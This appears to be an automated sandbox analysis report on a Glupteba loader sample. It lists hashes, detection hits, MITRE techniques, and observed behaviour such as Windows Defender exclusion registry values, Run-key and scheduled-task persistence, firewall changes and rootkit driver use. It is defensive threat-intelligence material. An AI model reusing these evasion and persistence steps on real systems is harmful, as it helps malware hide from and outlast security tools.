glupteba | 6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63

Analysis

max time kernel
299s
max time network
303s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
16/05/2024, 23:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Size

4.1MB
MD5

73b97e529d31d81b465c624d51a3e42a
SHA1

c479c4d1d7eb4ed1261ac6b112e0ab62ed8ba341
SHA256

6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63
SHA512

0e68162ac6289d84045d848c08ee39b0bd9bddabed256fc6dd1373cf06241afc34ed58c963a34cc2f27eb362a2f228b37810fc7bba66758bae5e92523c8a1f54
SSDEEP

98304:4GnSBwQ9juGdctRKF63fbBgevgqlIoRfv+0iKuUn4fGB:5gwQs9tRK43TBxgxoRH+0igngGB

Score

10^/10

glupteba discovery dropper evasion execution loader persistence rootkit trojan upx

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 31 IoCs

resource	yara_rule
behavioral2/memory/4144-299-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/4144-301-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/4144-302-0x0000000004950000-0x000000000523B000-memory.dmp	family_glupteba
behavioral2/memory/4144-300-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1384-1021-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1740-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1755-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1756-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1758-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1762-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1764-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1766-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1768-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1770-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1772-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1774-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1776-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1778-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1780-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1782-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1784-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1786-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1788-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1790-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1792-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1794-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-1796-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-2043-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-2530-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-2534-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba
behavioral2/memory/1460-2538-0x0000000000400000-0x0000000002959000-memory.dmp	family_glupteba

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
316	netsh.exe

Executes dropped EXE 7 IoCs

pid	Process
1460	csrss.exe
2628	injector.exe
4056	windefender.exe
2724	windefender.exe
2180	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
676	713674d5e968cbe2102394be0b2bae6f.exe
3872	1bf850b4d9587c1017a75a47680584c4.exe

UPX packed file 19 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4056-1750-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/files/0x000800000001ac3d-1751.dat	upx
behavioral2/memory/4056-1754-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/2724-1753-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/2724-1757-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/2724-1761-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/files/0x000a000000000699-2042.dat	upx
behavioral2/memory/2180-2045-0x0000000000400000-0x00000000008E1000-memory.dmp	upx
behavioral2/memory/2180-2051-0x0000000000400000-0x00000000008E1000-memory.dmp	upx
behavioral2/files/0x000500000000069d-2286.dat	upx
behavioral2/memory/676-2287-0x00000000012C0000-0x0000000001B8D000-memory.dmp	upx
behavioral2/files/0x00060000000006b1-2527.dat	upx
behavioral2/memory/3872-2528-0x0000000000400000-0x00000000008E8000-memory.dmp	upx
behavioral2/memory/676-2532-0x00000000012C0000-0x0000000001B8D000-memory.dmp	upx
behavioral2/memory/3872-2533-0x0000000000400000-0x00000000008E8000-memory.dmp	upx
behavioral2/memory/676-2536-0x00000000012C0000-0x0000000001B8D000-memory.dmp	upx
behavioral2/memory/3872-2537-0x0000000000400000-0x00000000008E8000-memory.dmp	upx
behavioral2/memory/676-2540-0x00000000012C0000-0x0000000001B8D000-memory.dmp	upx
behavioral2/memory/3872-2541-0x0000000000400000-0x00000000008E8000-memory.dmp	upx

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 10 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
File created	C:\Windows\rss\csrss.exe	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1132	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2640	powershell.exe
1344	powershell.exe
196	powershell.exe
2632	powershell.exe
1312	powershell.exe
2400	powershell.exe
4108	powershell.exe
4704	powershell.exe
2112	powershell.exe
3948	powershell.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1812	schtasks.exe
2904	schtasks.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	42	Go-http-client/1.1
HTTP User-Agent header	43	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	713674d5e968cbe2102394be0b2bae6f.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2631 = "Norfolk Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1344	powershell.exe
1344	powershell.exe
1344	powershell.exe
4144	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
4144	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
4108	powershell.exe
4108	powershell.exe
4108	powershell.exe
1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
196	powershell.exe
196	powershell.exe
196	powershell.exe
2632	powershell.exe
2632	powershell.exe
2632	powershell.exe
4704	powershell.exe
4704	powershell.exe
4704	powershell.exe
1312	powershell.exe
1312	powershell.exe
1312	powershell.exe
2112	powershell.exe
2112	powershell.exe
2112	powershell.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
1460	csrss.exe
1460	csrss.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
1460	csrss.exe
1460	csrss.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
1460	csrss.exe
1460	csrss.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe
2628	injector.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	1344	powershell.exe
Token: SeDebugPrivilege	4144	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Token: SeImpersonatePrivilege	4144	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
Token: SeDebugPrivilege	4108	powershell.exe
Token: SeDebugPrivilege	196	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	4704	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeSystemEnvironmentPrivilege	1460	csrss.exe
Token: SeSecurityPrivilege	1132	sc.exe
Token: SeSecurityPrivilege	1132	sc.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	3948	powershell.exe
Token: SeDebugPrivilege	2400	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 4144 wrote to memory of 1344	4144	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	75
PID 4144 wrote to memory of 1344	4144	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	75
PID 4144 wrote to memory of 1344	4144	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	75
PID 1384 wrote to memory of 4108	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	80
PID 1384 wrote to memory of 4108	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	80
PID 1384 wrote to memory of 4108	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	80
PID 1384 wrote to memory of 1824	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	82
PID 1384 wrote to memory of 1824	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	82
PID 1824 wrote to memory of 316	1824	cmd.exe	84
PID 1824 wrote to memory of 316	1824	cmd.exe	84
PID 1384 wrote to memory of 196	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	85
PID 1384 wrote to memory of 196	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	85
PID 1384 wrote to memory of 196	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	85
PID 1384 wrote to memory of 2632	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	87
PID 1384 wrote to memory of 2632	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	87
PID 1384 wrote to memory of 2632	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	87
PID 1384 wrote to memory of 1460	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	89
PID 1384 wrote to memory of 1460	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	89
PID 1384 wrote to memory of 1460	1384	6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe	89
PID 1460 wrote to memory of 4704	1460	csrss.exe	90
PID 1460 wrote to memory of 4704	1460	csrss.exe	90
PID 1460 wrote to memory of 4704	1460	csrss.exe	90
PID 1460 wrote to memory of 1312	1460	csrss.exe	96
PID 1460 wrote to memory of 1312	1460	csrss.exe	96
